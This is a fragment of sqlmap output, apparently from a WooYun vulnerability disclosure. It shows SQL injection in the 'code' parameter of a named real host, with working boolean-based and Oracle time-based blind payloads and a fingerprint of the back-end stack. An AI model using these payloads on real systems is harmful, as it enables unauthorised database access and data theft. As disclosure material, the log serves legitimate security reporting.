WooYun.org

[18:51:07] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
GET parameter 'code' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection points with a total of 61 HTTP(s) requests:
---
Place: GET
Parameter: code
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: code=88') AND 8471=8471 AND ('ItzX'='ItzX&codeType=province&page=0&pagesize=6&sort='PC1001'&t=1415697252399
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: code=88') AND 7810=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(114)||CHR(108)||CHR(120),5) AND ('umRc'='umRc&codeType=province&page=0&pagesize=6&sort='PC1001'&t=1415697252399
---
[18:51:54] [INFO] the back-end DBMS is Oracle
web application technology: Servlet 3.0, Nginx
back-end DBMS: Oracle
[18:51:54] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 3 times
[18:51:54] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/e.boc.cn'